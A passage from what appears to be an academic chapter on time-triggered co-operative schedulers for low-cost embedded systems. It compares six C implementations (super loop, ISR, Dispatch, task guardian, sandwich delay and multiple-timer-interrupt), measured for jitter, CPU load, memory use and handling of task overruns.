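static int  data[DATA_LEN];     /* input buffer */
static int  progress;           /* next index to process; persists across calls */
static long total;              /* accumulated result */

/* Run one slice of the job; returns true once the whole buffer is done. */
bool SumTask_Update(void)
{
    int end = progress + SLICE_LEN;
    if (end > DATA_LEN) {
        end = DATA_LEN;
    }
    while (progress < end) {
        total += data[progress++];
    }
    return (progress >= DATA_LEN);
}
```

Calling `SumTask_Update()` once per scheduler tick turns one long task called infrequently into ten short tasks called frequently, exactly in the spirit of the quoted advice.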
However, if changing the task design or microcontroller hardware does not provide the level of performance which is desired for a particular application, then more than one microcontroller can be used. In such cases, long tasks can easily be moved to another processor, allowing the host processor to respond rapidly to other events as required (for further details, see Pont, 2001; Ayavoo et al., 2007). Please note that the very wide use of pre-emptive schedulers may simply result from a poor understanding, and hence an undervaluation, of co-operative schedulers. For example, a co-operative scheduler can easily be constructed using only a few hundred lines of highly portable code written in a high-level programming language (such as 'C'), while the resulting system is highly-predictable (Pont, 2001). It is also important to understand that pre-emptive schedulers are sometimes more widely used in RTOSs for commercial reasons. For example, companies may derive commercial benefits from using pre-emptive environments. As the complexity of these environments increases, the code size increases significantly, making 'in-house' construction of such environments too complicated. Such complexity factors lead to the sale of commercial RTOS products at high prices (Pont, 2001). Therefore, further academic research has been conducted in this area to explore alternative solutions. For example, over the last few years, researchers in the Embedded Systems Laboratory (ESL) have considered various ways in which simple, highly-predictable, non-pre-emptive (co-operative) schedulers can be implemented in low-cost embedded systems.

4. Scheduling algorithm and scheduler implementation

A key component of the scheduler is the scheduling algorithm, which basically determines the order in which the tasks will be executed by the scheduler (Buttazzo, 2005).
More specifically, a scheduling algorithm is the set of rules that, at every instant while the system is running, determines which task must be allocated the resources to execute. Developers of embedded systems have proposed various scheduling algorithms that can be used to handle tasks in real-time applications. The selection of an appropriate scheduling algorithm for a set of tasks is based upon the capability of the algorithm to satisfy all timing constraints of the tasks, where these constraints are derived from the application requirements. Examples of common scheduling algorithms are: Cyclic Executive (Locke, 1992), Rate Monotonic (Liu & Layland, 1973), Earliest-Deadline-First (Liu & Layland, 1973; Liu, 2000), Least-Laxity-First (Mok, 1983), Deadline Monotonic (Leung, 1982) and Shared-Clock (Pont, 2001) schedulers (see Rao et al., 2008 for a simple classification of scheduling algorithms). This chapter outlines one key example of a scheduling algorithm that is widely used in the design of real-time embedded systems when highly-predictable system behavior is an essential requirement: the Time-Triggered Co-operative scheduler, which is a form of cyclic executive. Note that once the design specifications are converted into appropriate design elements, the system implementation process can take place by translating those designs into software and hardware components. People working on the development of embedded systems are often concerned with the software implementation of the system, in which the system specifications are converted into an executable system (Sommerville, 2007; Koch, 1999). For example, Koch interpreted the implementation of a system as the way in which the software program is arranged to meet the system specifications. The implementation of schedulers is a major problem which faces designers of real-time scheduling systems (for example, see Cho et al., 2005).
In their useful publication, Cho and colleagues clarified that the well-known term scheduling is used to describe the process of finding the optimal schedule for a set of real-time tasks, while the term scheduler implementation refers to the process of implementing a physical (software or hardware) scheduler that enforces – at run-time – the task sequencing determined by the designed schedule (Cho et al., 2007). Generally, it has been argued that there is a wide gap between scheduling theory and its implementation in operating system kernels running on specific hardware, and for any meaningful validation of the timing properties of real-time applications, this gap must be bridged (Katcher et al., 1993). The relationship between any scheduling algorithm and the number of possible implementation options for that algorithm – in practical designs – has generally been viewed as 'one-to-many', even for very simple systems (Baker & Shaw, 1989; Koch, 1999; Pont, 2001; Baruah, 2006; Pont et al., 2007; Phatrapornnant, 2007). For example, Pont et al. (2007) clearly mentioned that if someone were to use a particular scheduling architecture, then there are many different implementation options available. This claim was also supported by Phatrapornnant (2007), who noted that the TTC scheduler (which is a form of cyclic executive) is only an algorithm: in practice, there can be many possible ways to implement such an algorithm. The performance of a real-time system depends crucially on implementation details that cannot be captured at the design level; it is thus more appropriate to evaluate the real-time properties of the system after it is fully implemented (Avrunin et al., 1998).

5. Time-triggered co-operative (TTC) scheduling algorithm

A key defining characteristic of a time-triggered (TT) system is that it can be expected to have highly-predictable patterns of behavior.
This means that when a computer system has a time-triggered architecture, it can be determined in advance – before the system begins executing – exactly what the system will do at every moment of time while the system is operating. Based on this definition, completely defined TT behavior is – of course – difficult to achieve in practice. Nonetheless, approximations of this model have been found to be useful in a great many practical systems. The closest approximation of a “perfect” TT architecture which is in widespread use involves a collection of periodic tasks which operate co-operatively (or “non-pre-emptively”). Such a time-triggered co-operative (TTC) architecture has sometimes been described as a cyclic executive (e.g. Baker & Shaw, 1989; Locke, 1992). According to Baker and Shaw (1989), the cyclic executive scheduler has the following properties:

- tasks are executed in a sequential order that is defined prior to system activation;
- the number of tasks is fixed;
- each task is allocated an execution slot (called a minor cycle or a frame) during which it executes;
- a task – once started by the scheduler – executes to completion without interruption from other tasks;
- all tasks are periodic, and the deadline of each task is equal to its period;
- the worst-case execution time of all tasks is known;
- there is no context switching between tasks;
- tasks are scheduled in a repetitive cycle called the major cycle.

The major cycle can be defined as the time period during which each task in the scheduler executes – at least – once and before the whole task execution pattern is repeated. This is numerically calculated as the lowest common multiple (LCM) of the periods of the scheduled tasks (Baker & Shaw, 1989; Xu & Parnas, 1993). Koch (1999) emphasized that the cyclic executive is a “proof-by-construction” scheme in which no schedulability analysis is required prior to system construction. Fig.
6 illustrates the (time-triggered) cyclic executive model for a simple set of four periodic tasks. Note that the final task in the task-group (i.e. Task D) must complete execution before the arrival of the next timer interrupt which launches a new (major) execution cycle. In the example shown, each task is executed only once during the whole major cycle which is, in this case, made up of four minor cycles. Note that the task periods may not always be identical as in the example shown in Fig. 6. When task periods vary, the scheduler should define a sequence in which each task is repeated sufficiently often to meet its frequency requirement (Locke, 1992). Fig. 7 shows the general structure of the time-triggered cyclic executive (i.e. time-triggered co-operative) scheduler. In the example shown in this figure, the scheduler has a minor cycle of 10 ms and period values of 20, 10 and 40 ms for the tasks A, B and C, respectively. The LCM of these periods is 40 ms, therefore the length of the major cycle in which all tasks will be executed periodically is 40 ms. It is suggested that the minor cycle of the scheduler (which is also referred to as the tick interval: see Pont, 2001) can be set equal to or less than the greatest common divisor of all task periods (Phatrapornnant, 2007). In the example shown in Fig. 7, this value is equal to 10 ms. In practice, the minor cycle is driven by a periodic interrupt generated by the overflow of an on-chip hardware timer or by the arrival of events in the external environment (Locke, 1992; Pont, 2001). The vertical arrows in the figure represent the points at which minor cycles (ticks) start. Overall, TTC schedulers have many advantages. A key advantage is their simplicity (Baker & Shaw, 1989; Liu, 2000; Pont, 2001).
Furthermore, since pre-emption is not allowed, mechanisms for context switching are not required and, as a consequence, the run-time overhead of a TTC scheduler can be kept very low (Locke, 1992; Buttazzo, 2005). Also, developing TTC schedulers requires no concern about protecting the integrity of shared data structures or shared resources because only one task in the whole system can use the resources at any one time, and the next due task cannot begin its execution until the running task is completed (Baker & Shaw, 1989; Locke, 1992). Since all tasks are run regularly according to their predefined order in a deterministic manner, TTC schedulers demonstrate very low levels of task jitter (Locke, 1992; Bate, 1998; Buttazzo, 2005) and can maintain their low-jitter characteristics even when complex techniques, such as dynamic voltage scaling (DVS), are employed to reduce system power consumption (Phatrapornnant & Pont, 2006). Therefore, as would be expected (and unlike RM designs, for example), systems with TTC architectures can have highly-predictable timing behavior (Baker & Shaw, 1989; Locke, 1992). Locke (1992) underlines that with cyclic executive systems, “it is possible to predict the entire future history of the state of the machine, once the start time of the system is determined (usually at power-on). Thus, assuming this future history meets the response requirements generated by the external environment in which the system is to be used, it is clear that all response requirements will be met. Thus it fulfills the basic requirements of a hard real time system.” Provided that an appropriate implementation is used, TTC architectures can be a good match for a wide range of low-cost embedded applications. For example, previous studies have described – in detail – how these techniques can be applied in various automotive applications (e.g.
Ayavoo et al., 2006; Ayavoo, 2006), a wireless (ECG) monitoring system (Phatrapornnant & Pont, 2004; Phatrapornnant, 2007), various control applications (e.g. Edwards et al., 2004; Key et al., 2004; Short & Pont, 2008), and in data acquisition systems, washing-machine control and monitoring of liquid flow rates (Pont, 2002). Outside the ESL group, Nghiem et al. (2006) described an implementation of a PID controller using the TTC scheduling algorithm and illustrated how such an architecture can help increase the overall system performance as compared with alternative implementation methods. However, TTC architectures have some shortcomings. For example, many researchers argue that running tasks without pre-emption may cause other tasks to wait for some time and hence miss their deadlines. However, the availability of high-speed, COTS microcontrollers nowadays helps to reduce the effect of this problem and, as processor speeds continue to increase, non-pre-emptive scheduling approaches are expected to gain more popularity in the future (Baruah, 2006). Another issue with TTC systems is that the task schedule is usually calculated based on estimates of the Worst Case Execution Time (WCET) of the running tasks. If such estimates prove to be incorrect, this may have a serious impact on the system behavior (Buttazzo, 2005). One recognized disadvantage of using TTC schedulers is the lack of flexibility (Locke, 1992; Bate, 1998). This is simply because TTC is usually viewed as a ‘table-driven’ static scheduler (Baker & Shaw, 1989), which means that any modification or addition of a new functionality, during any stage of the system development process, may need an entirely new schedule to be designed and constructed (Locke, 1992; Koch, 1999).
This reconstruction of the system adds more time overhead to the design process; however, using tools such as those developed recently to support “automatic code generation” (Mwelwa et al., 2006; Mwelwa, 2006; Kurian & Pont, 2007), the work involved in developing and maintaining such systems can be substantially reduced. Another drawback of TTC systems, as noted by Koch (1999), is that constructing the cyclic executive model for a large set of tasks with periods that are prime to each other can be prohibitively expensive. However, in practice, there is some flexibility in the choice of task periods (Xu & Parnas, 1993; Pont, 2001). For example, Gerber et al. (1995) demonstrated how a feasible solution for task periods can be obtained by considering the period harmonicity relationship of each task with all its successors. Kim et al. (1999) went further to improve and automate this period calibration method. Please also note that using a table to store the task schedule is only one way of implementing the TTC algorithm; in practice, there can be other implementation methods (Baker & Shaw, 1989; Pont, 2001). For example, Pont (2001) described an alternative to table-driven schedule implementation for the TTC algorithm which has the potential to solve the co-prime periods problem and also simplify the process of modifying the whole task schedule later in the development life cycle or during the system run-time. Furthermore, it has also been reported that a long task whose execution time exceeds the period of the highest rate (shortest period) task cannot be scheduled on the basic TTC scheduler (Locke, 1992). One solution to this problem is to break down the long task into multiple short tasks that can fit in the minor cycle. A possible alternative solution is to use a Time-Triggered Hybrid (TTH) scheduler (Pont, 2001) in which a limited degree of pre-emption is supported.
One acknowledged advantage of the TTH scheduler is that it enables the designer to build a static, fixed-priority schedule made up of a collection of co-operative tasks and a single (short) pre-emptive task (Phatrapornnant, 2007). Note that TTH architectures are not covered in this chapter. For more details about these scheduling approaches, see (Pont, 2001; Maaita & Pont, 2005; Hughes & Pont, 2008; Phatrapornnant, 2007). Please note that later in this chapter, it will be demonstrated how, with extra care at the implementation stage, one can easily deal with many of the TTC scheduler limitations indicated above.

6. Jitter in TTC scheduling algorithm

Jitter is a term which describes variations in the timing of activities (Wavecrest, 2001). The work presented in this chapter is concerned with implementing highly-predictable embedded systems. Predictability is one of the most important objectives of real-time embedded systems; it can simply be defined as the ability to determine, in advance, exactly what the system will do at every moment of time in which it is running. One way in which predictable behavior manifests itself is in low levels of task jitter. Jitter is a key timing parameter that can have detrimental impacts on the performance of many applications, particularly those involving periodic sampling and/or data generation (e.g. data acquisition, data playback and control systems: see Torngren, 1998). For example, Cottet & David (1999) show that – during data acquisition tasks – jitter rates of 10% or more can introduce errors which are so significant that any subsequent interpretation of the sampled signal may be rendered meaningless. Similarly, Jerri (1977) discusses the serious impact of jitter on applications such as spectrum analysis and filtering. Also, in control systems, jitter can greatly degrade performance by varying the sampling period (Torngren, 1998; Marti et al., 2001).
When TTC architectures (which represent the main focus of this chapter) are employed, possible sources of task jitter can be divided into three main categories: scheduling overhead variation, task placement and clock drift. The overhead of a conventional (non-co-operative) scheduler arises mainly from context switching. However, in some TTC systems the scheduling overhead is comparatively large and may have a highly variable duration due to code branching or computations that have non-fixed lengths. As an example, Fig. 8 illustrates how a TTC system can suffer release jitter as a result of variations in the scheduler overhead (this example relates to a DVS system). Even if the scheduler overhead variations can be avoided, TTC designs can still suffer from jitter as a result of task placement. To illustrate this, consider Fig. 9. In this schedule example, Task C runs sometimes after A, sometimes after A and B, and sometimes alone. Therefore, the period between every two successive runs of Task C is highly variable. Moreover, if Tasks A and B have variable execution durations (as in Fig. 8), then the jitter levels of Task C will be even larger. For completeness of this discussion, it is also important to consider clock drift as a source of task jitter. In TTC designs, a clock “tick” is generated by a hardware timer that is used to trigger the execution of the cyclic tasks (Pont, 2001). This mechanism relies on the presence of a timer that runs at a fixed frequency. In such circumstances, any jitter will arise from variations at the hardware level (e.g. through the use of a low-cost frequency source, such as a ceramic resonator, to drive the on-chip oscillator: see Pont, 2001). In the TTC scheduler implementations considered in this study, the software developer has no control over the clock source. However, in some circumstances, those implementing a scheduler must take such factors into account.
For example, in situations where DVS is employed (to reduce CPU power consumption), it may take a variable amount of time for the processor’s phase-locked loop (PLL) to stabilize after the clock frequency is changed (see Fig. 10). As discussed elsewhere, it is possible to compensate for such changes in software and thereby reduce jitter (see Phatrapornnant & Pont, 2006; Phatrapornnant, 2007).

7. Various TTC scheduler implementations for highly-predictable embedded systems

In this section, a set of “representative” examples of the various classes of TTC scheduler implementations are reviewed. In total, the section reviews six TTC implementations.

### 7.1 Super loop (SL) scheduler

The simplest practical implementation of a TTC scheduler can be created using a “Super Loop” (SL), sometimes called an “endless loop” (Kalinsky, 2001). The super loop can be used as the basis for implementing a simple TTC scheduler (e.g. Pont, 2001; Kurian & Pont, 2007). A possible implementation of a TTC scheduler using a super loop is illustrated in Listing 1.

```c
int main(void)
{
    ...

    while(1)
    {
        TaskA();
        Delay_6ms();
        TaskB();
        Delay_6ms();
        TaskC();
        Delay_6ms();
    }

    // Should never reach here
    return 1;
}
```

Listing 1. A very simple TTC scheduler which executes three periodic tasks, in sequence. By assuming that each task in Listing 1 has a fixed duration of 4 ms, a TTC system with a 10 ms “tick interval” has been created using a combination of super loop and delay functions (Fig. 11).

![Fig. 11. The task executions resulting from the code in Listing 1 (Nahas, 2011b).](image_url)

In the case where the scheduled tasks have variable durations, creating a fixed tick interval is not straightforward. One way of doing that is to use a “Sandwich Delay” (Pont et al., 2006) placed around the tasks. Briefly, a Sandwich Delay (SD) is a mechanism – based on a
hardware timer – which can be used to ensure that a particular code section always takes approximately the same period of time to execute. The SD operates as follows: [1] A timer is set to run; [2] An activity is performed; [3] The system waits until the timer reaches a predetermined count value. In these circumstances – as long as the timer count is set to a duration that exceeds the WCET of the sandwiched activity – the SD mechanism has the potential to fix the execution period. Listing 2 shows how the tasks in Listing 1 can be scheduled – again using a 10 ms tick interval – if their execution durations are not fixed.

```c
int main(void)
{
    while(1)
    {
        // Set up a timer for the sandwich delay
        SANDWICH_DELAY_Start();

        // Add tasks in the first tick interval
        Task_A();

        // Wait for 10 millisecond sandwich delay
        SANDWICH_DELAY_Wait(10);

        // Add tasks in the second tick interval
        Task_B();

        // Wait for 20 millisecond sandwich delay
        SANDWICH_DELAY_Wait(20);

        // Add tasks in the third tick interval
        Task_C();

        // Wait for 30 millisecond sandwich delay
        SANDWICH_DELAY_Wait(30);
    }

    // Should never reach here
    return 1;
}
```

Listing 2. A TTC scheduler which executes three periodic tasks with variable durations, in sequence. Using the code listing shown, the successive function calls will take place at fixed intervals, even if these functions have large variations in their durations (Fig. 12). For further information, see (Nahas, 2011b).

Fig. 12. The task executions expected from the TTC-SL scheduler code shown in Listing 2 (Nahas, 2011b).

### 7.2 A TTC-ISR scheduler

In general, software architectures based on a super loop can be seen as simple, highly efficient and portable (Pont, 2001; Kurian & Pont, 2007). However, these approaches cannot provide accurate timing and use power resources inefficiently, as the system always operates at full power, which is not necessary in many applications.
An alternative (and more efficient) solution to this problem is to make use of the hardware resources to control the timing and power behavior of the system. For example, a TTC scheduler implementation can be created using an “Interrupt Service Routine” (ISR) linked to the overflow of a hardware timer. In such approaches, the timer is set to overflow at regular “tick intervals” to generate periodic “ticks” that will drive the scheduler. The rate of the tick interval can be set equal to (or higher than) the rate of the task which runs at the highest frequency (Phatrapornnant, 2007). In the TTC-ISR scheduler, when the timer overflows and a tick interrupt occurs, the ISR will be called, and awaiting tasks will then be activated from the ISR directly. Fig. 13 shows how such a scheduler can be implemented in software. In this example, it is assumed that one of the microcontroller’s timers has been set to generate an interrupt once every 10 ms, and thereby call the function Update(). This Update() function represents the scheduler ISR. At the first tick, the scheduler will run Task A then go back to the while loop in which the system is placed in the idle mode waiting for the next interrupt. When the second interrupt takes place, the scheduler will enter the ISR and run Task B, then the cycle continues. The overall result is a system which has a 10 ms “tick interval” and three tasks executed in sequence (see Fig. 14).

```c
while(1)
{
    Go_To_Sleep();
}
```

```c
void Update(void)
{
    Tick_G++;

    switch(Tick_G)
    {
        case 1:
            Task_A();
            break;

        case 2:
            Task_B();
            break;

        case 3:
            Task_C();
            Tick_G = 0;
            break;
    }
}
```

Fig. 13. A schematic representation of a simple TTC-ISR scheduler (Nahas, 2008). Whether or not the idle mode is used in a TTC-ISR scheduler, the timing observed is largely independent of the software used but instead depends on the underlying timer hardware (which will usually mean the accuracy of the crystal oscillator driving the microcontroller).
One consequence of this is that, for the system shown in Fig. 13 (for example), the successive function calls will take place at precisely-defined intervals, even if there are large variations in the duration of tasks which are run from the `Update()` function (Fig. 14). This is very useful behavior which is not easily obtained with implementations based on a super loop. The function call tree for the TTC-ISR scheduler is shown in Fig. 15. For further information, see (Nahas, 2008).

![Fig. 14. The task executions expected from the TTC-ISR scheduler code shown in Fig. 13 (Nahas, 2008).](image)

### 7.3 TTC-Dispatch scheduler

Implementation of a TTC-ISR scheduler requires a significant amount of hand coding (to control the task timing), and there is no division between the “scheduler” code and the “application” code (i.e. tasks). The TTC-Dispatch scheduler provides a more flexible alternative. It is characterized by distinct and well-defined scheduler functions. Like TTC-ISR, the TTC-Dispatch scheduler is driven by periodic interrupts generated from an on-chip timer. When an interrupt occurs, the processor executes an `Update()` function. In the scheduler implementation discussed here, the `Update()` function simply keeps track of the number of ticks. A `Dispatch()` function will then be called, and the due tasks (if any) will be executed one-by-one. Note that the `Dispatch()` function is called from an “endless” loop placed in the function `Main()`: see Fig. 16. When not executing the `Update()` or `Dispatch()` functions, the system will usually enter the low-power idle mode. In this TTC implementation, the software employs `SCH_Add_Task()` and `SCH_Delete_Task()` functions to help the scheduler add and/or remove tasks during the system run-time.
Such a scheduler architecture provides support for “one shot” tasks and dynamic scheduling where tasks can be scheduled online if necessary (Pont, 2001). To add a task to the scheduler, two main parameters have to be defined by the user in addition to the task’s name: the task’s offset and the task’s period. The offset specifies the time (in ticks) before the task is first executed. The period specifies the interval (also in ticks) between repeated executions of the task. In the `Dispatch()` function, the scheduler checks these parameters for each task before running it. Please note that information about tasks is stored in a user-defined scheduler data structure. Both the “sTask” data type and the “SCH_MAX_TASKS” constant are used to create the “Task Array” which is referred to throughout the scheduler as “sTask SCH_tasks_G[SCH_MAX_TASKS]”. See (Pont, 2001) for further details. The function call tree for the TTC-Dispatch scheduler is shown in Fig. 16.

![Fig. 16. Function call tree for the TTC-Dispatch scheduler (Nahas, 2011a).](image)

Fig. 16 illustrates the whole scheduling process in the TTC-Dispatch scheduler. For example, it shows that the first function to run (after the startup code) is the `Main()` function. `Main()` calls `Dispatch()` which in turn launches any tasks which are currently scheduled to execute. Once these tasks are complete, control returns to `Main()`, which calls `Sleep()` to place the processor in the idle mode. The timer interrupt then occurs, waking the processor from the idle state and invoking the ISR `Update()`. The function call then returns all the way back to `Main()`, where `Dispatch()` is called again and the whole cycle thereby continues. For further information, see (Nahas, 2008).

### 7.4 Task Guardians (TG) scheduler

Despite many attractive characteristics, TTC designs can be seriously compromised by tasks that fail to complete within their allotted periods.
The TTC-TG scheduler implementation described in this section employs a Task Guardian (TG) mechanism to deal with the impact of such task overruns. When dealing with task overruns, the TG mechanism is required to shut down any task which is found to be overrunning. The proposed solution also provides the option of replacing the overrunning task with a backup task (if required). The implementation is again based on TTC-Dispatch (Section 7.3). In the event of a task overrun with the ordinary Dispatch scheduler, the timer ISR will interrupt the overrunning task (rather than the `Sleep()` function). If the overrunning task keeps executing, it will be periodically interrupted by `Update()` while all other tasks will be blocked until the task finishes (if ever): this is shown in Fig. 17. Note that (a) illustrates the required task schedule, and (b) illustrates the scheduler operation when Task A overruns by 5 tick intervals.

![Fig. 17. The impact of task overrun on a TTC scheduler (Nahas, 2008).](image)

In order for the TG mechanism to work, various functions in the TTC-Dispatch scheduler are modified as follows:

- **Dispatch()** indicates that a task is being executed.
- **Update()** checks to see if an overrun has occurred. If it has, control is passed back to **Dispatch()**, shutting down the overrunning task.
- If a backup task exists it will be executed by **Dispatch()**.
- Normal operation then continues.

In a little more detail, detecting overrun in this implementation uses a simple, efficient method employed in the **Dispatch()** function. It simply adds a “Task_Overrun” variable which is set equal to the task index before the task is executed. When the task completes, this variable will be assigned the value of (for example) 255 to indicate a successful completion. If a task overruns, the **Update()** function in the next tick should detect this since it checks the Task_Overrun variable against the last task index value.
The **Update()** function then changes the return address to an **End_Task()** function instead of the overrunning task. The **End_Task()** function should return control to **Dispatch()**. Note that moving control from **Update()** to **End_Task()** is a non-trivial process and can be done in different ways (Hughes & Pont, 2004). **End_Task()** has the responsibility to shut down the overrunning task. Also, it determines the type of function that has overrun and begins to restore register values accordingly. This process is complicated; it aims to return the scheduler to its normal operation while making sure the overrun has been resolved completely. Once the overrun is dealt with, the scheduler replaces the overrunning task with a backup task which is set to run immediately before running other tasks. If there is no backup task defined by the user, then the TTC-TG scheduler implements a mechanism which lowers the priority of the task that overran, so as to reduce the impact of any future overrunning by this task. The function call tree for the TTC-TG scheduler is shown in Fig. 18.

![Fig. 18. Function call tree for the TTC-TG scheduler (Nahas, 2008).](image)

Note that the scheduler structure used in the TTC-TG scheduler is the same as that employed in the TTC-Dispatch scheduler, which is simply based on an ISR Update linked to a timer interrupt and a Dispatch function called periodically from the Main code (Section 7.3). For further details, see (Hughes & Pont, 2008).

### 7.5 Sandwich Delay (SD) scheduler

In Section 6, the impact of task placement on “low-priority” tasks running in TTC schedulers was considered. The TTC schedulers described in Sections 7.1 - 7.4 lack the ability to deal with jitter in the starting time of such tasks. One way to address this issue is to place a “Sandwich Delay” (Pont et al., 2006) around tasks which execute prior to other tasks in the same tick interval.
In the TTC-SD scheduler described in this section, sandwich delays are used to provide execution “slots” of fixed sizes in situations where there is more than one task in a tick interval. To clarify this, consider the set of tasks shown in Fig. 19. In the figure, the required SD prior to Task C – for low jitter behavior – is equal to the WCET of Task A plus the WCET of Task B. This implies that in the second tick (for example), the scheduler runs Task A and then waits for a period equal to the WCET of Task B before running Task C. The figure shows that when SDs are placed around the tasks prior to Task C, the periods between successive runs of Task C become equal and hence jitter in the release time of this task is significantly reduced.

![Fig. 19. Using Sandwich Delays to reduce release jitter in TTC schedulers (Nahas, 2011a).](image)

Note that – with this implementation – the WCET for each task is input to the scheduler through a `SCH_Task_WCET()` function placed in the Main code. After entering task parameters, the scheduler employs `Calc_Sch_Major_Cycle()` and `Calculate_Task_RT()` functions to calculate the scheduler major cycle and the required release time for the tasks, respectively. The release time values are stored in the “Task Array” using the variable `SCH_tasks_G[Index].Rls_time`. Note that the required release time of a task is the time between the start of the tick interval and the start time of the task “slot” plus a little safety margin. For further information, see (Nahas, 2011a).

### 7.6 Multiple Timer Interrupts (MTI) scheduler

As an alternative to the SD technique, which requires a large amount of computational time, a “gap insertion” mechanism that uses “Multiple Timer Interrupts” (MTIs) can be employed. In the TTC-MTI scheduler described in this section, multiple timer interrupts are used to generate the predefined execution “slots” for tasks.
This allows more precise control of timing in situations where more than one task executes in a given tick interval. The use of interrupts also allows the processor to enter an idle mode after completion of each task, resulting in power saving. In order to implement this technique, two interrupts are required:

- **Tick interrupt:** used to generate the scheduler periodic tick.
- **Task interrupt:** used – within tick intervals – to trigger the execution of tasks.

The process is illustrated in Fig. 20. In this figure, to achieve zero jitter, the required release time prior to Task C (for example) is equal to the WCET of Task A plus the WCET of Task B plus the scheduler overhead (i.e. the ISR `Update()` function). This implies that in the second tick (for example), after running the ISR, the scheduler waits – in idle mode – for a period of time equal to the WCETs of Task A and Task B before running Task C. Fig. 20 shows that when an MTI method is used, the periods between the successive runs of Task C (the lowest priority task in the system) are always equal. This means that the task jitter in such an implementation is independent of the task placement or the duration(s) of the preceding task(s).

Fig. 20. Using MTIs to reduce release jitter in TTC schedulers (Nahas, 2011a).

In the implementation considered in this section, the WCET for each task is input to the scheduler through a SCH_Task_WCET() function placed in the Main() code. The scheduler then employs Calc_Sch_Major_Cycle() and Calculate_Task_RT() functions to calculate the scheduler major cycle and the required release time for the tasks, respectively. Moreover, there is no Dispatch() called in the Main() code: instead, “interrupt request wrappers” – which contain Assembly code – are used to manage the sequence of operation in the whole scheduler. The function call tree for the TTC-MTI scheduler is shown in Fig. 21 (compare with Fig. 16). Fig. 21.
Function call tree for the TTC-MTI scheduler (in normal conditions) (Nahas, 2011a). Unlike the normal Dispatch schedulers, this implementation relies on two interrupt Update() functions: Tick Update() and Task Update(). The Tick Update() function – which is called every tick interval (as normal) – identifies which tasks are ready to execute within the current tick interval. Before placing the processor in idle mode, the Tick Update() function sets the match register of the task timer according to the release time of the first task due to run in the current interval. The calculation of the release time of the first task in the system takes into account the WCET of the Tick Update() code. When the task interrupt occurs, the Task Update() function sets the return address to the task that will be executed straight after this update function, and sets the match register of the task timer for the next task (if any). The scheduled task then executes as normal. Once the task completes its execution, the processor goes back to Sleep() and waits for the next task interrupt (if there are further tasks to execute) or the next tick interrupt, which launches a new tick interval. Note that the Task Update() code is written in such a way that it always has a fixed execution duration, in order to avoid jitter in the start times of tasks. It is worth highlighting that the TTC-MTI scheduler described here employs a form of “task guardians” which helps the system avoid any overruns in the operating tasks. More specifically, the described MTI technique helps the TTC scheduler shut down any overrunning task by the time the following interrupt takes place. For example, if the overrunning task is followed by another task in the same tick, then the task interrupt – which triggers the execution of the latter task – will immediately terminate the overrun. Otherwise, the task can overrun until the next tick interrupt takes place, which will then terminate the overrun immediately.
The function call tree for the TTC-MTI scheduler – when a task overrun occurs – is shown in Fig. 22. The only difference between this process and the one shown in Fig. 21 is that an ISR will interrupt the overrunning task (rather than the Sleep() function). Again, if the overrunning task is the last task to execute in a given tick, then it will be interrupted and terminated by the Tick Update() at the next tick interval; otherwise, it will be terminated by the following Task Update(). For further information, see (Nahas, 2011a). Fig. 22. Function call tree for the TTC-MTI scheduler (with task overrun) (Nahas, 2008).

8. Evaluation of TTC scheduler implementations

This section provides the results of the various TTC implementations considered in the previous section. The results include jitter levels, error handling capabilities and resource (i.e. CPU and memory) requirements. The section begins by briefly describing the experimental methodology used in this study.

8.1 Experimental methodology

The empirical studies were conducted using an Ashling LPC2000 evaluation board with a Philips LPC2106 processor (Ashling Microsystems, 2007). The LPC2106 is a modern 32-bit microcontroller with an ARM7 core which can run – under the control of an on-chip PLL – at frequencies from 12 MHz to 60 MHz. The compiler used was GCC ARM 4.1.1, operating in Windows by means of Cygwin (a Linux emulation layer for Windows). The IDE and simulator used were those of the Keil ARM development kit (v3.12). For a meaningful comparison of jitter results, the task set shown in Fig. 23 was used; it allows the impact of scheduling-induced jitter to be explored by scheduling Task A to run every two ticks. Moreover, all tasks were set to have variable execution durations to allow the impact of task-induced jitter to be explored.
For the jitter measurements, two measures were recorded: tick jitter, represented by the variations in the interval between the release times of the periodic tick; and task jitter, represented by the variations in the interval between the release times of periodic tasks. Jitter was measured using a National Instruments data acquisition card ‘NI PCI-6035E’ (National Instruments, 2006), used in conjunction with LabVIEW 7.1 software (LabVIEW, 2007). The “difference jitter” was reported, which is obtained by subtracting the minimum period (between successive ticks or tasks) from the maximum period obtained from the measurements in the sample set. This jitter is sometimes referred to as “absolute jitter” (Buttazzo, 2005). The CPU overhead was measured using the performance analyzer supported by the Keil simulator, which calculates the time required by the scheduler as compared to the total runtime of the program. The percentage of the measured CPU time was then reported to indicate the scheduler overhead in each TTC implementation. For the ROM and RAM memory overheads, the CODE and DATA memory values required to implement each scheduler were recorded, respectively. The memory values were obtained using the “.map” file which is created when the source code is compiled. The STACK usage was also measured (as DATA memory overhead) by initially filling the data memory with ‘DEAD CODE’ and then reporting the number of memory bytes that had been overwritten after running the scheduler for a sufficient period.

8.2 Results

This section summarizes the results obtained in this study. Table 1 presents the jitter levels, CPU requirements, memory requirements and the ability to deal with task overruns for all schedulers. The jitter results include both tick and task jitter. The ability to deal with task overruns is divided into six different cases, as shown in Table 2. In the table, it is assumed that Task A is the overrunning task.
<table>
<thead>
<tr> <th>Scheduler</th> <th>Tick Jitter (µs)</th> <th>Task A Jitter (µs)</th> <th>Task B Jitter (µs)</th> <th>Task C Jitter (µs)</th> <th>CPU %</th> <th>ROM (Bytes)</th> <th>RAM (Bytes)</th> <th>Ability to deal with task overrun</th> </tr>
</thead>
<tbody>
<tr> <td>TTC-SL</td> <td>1.2</td> <td>1.5</td> <td>4016.2</td> <td>5772.2</td> <td>100</td> <td>2264</td> <td>124</td> <td>1b</td> </tr>
<tr> <td>TTC-ISR</td> <td>0.0</td> <td>0.1</td> <td>4016.7</td> <td>5615.8</td> <td>39.5</td> <td>2256</td> <td>127</td> <td>1a</td> </tr>
<tr> <td>TTC Dispatch</td> <td>0.0</td> <td>0.1</td> <td>4022.7</td> <td>5699.8</td> <td>39.7</td> <td>4012</td> <td>325</td> <td>1b</td> </tr>
<tr> <td>TTC-TG</td> <td>0.0</td> <td>0.1</td> <td>4026.2</td> <td>5751.9</td> <td>39.8</td> <td>4296</td> <td>446</td> <td>2b</td> </tr>
<tr> <td>TTC-SD</td> <td>0.0</td> <td>0.1</td> <td>1.5</td> <td>1.5</td> <td>74.0</td> <td>5344</td> <td>310</td> <td>1b</td> </tr>
<tr> <td>TTC-MTI</td> <td>0.0</td> <td>0.1</td> <td>0.0</td> <td>0.0</td> <td>39.6</td> <td>3620</td> <td>514</td> <td>3a</td> </tr>
</tbody>
</table>

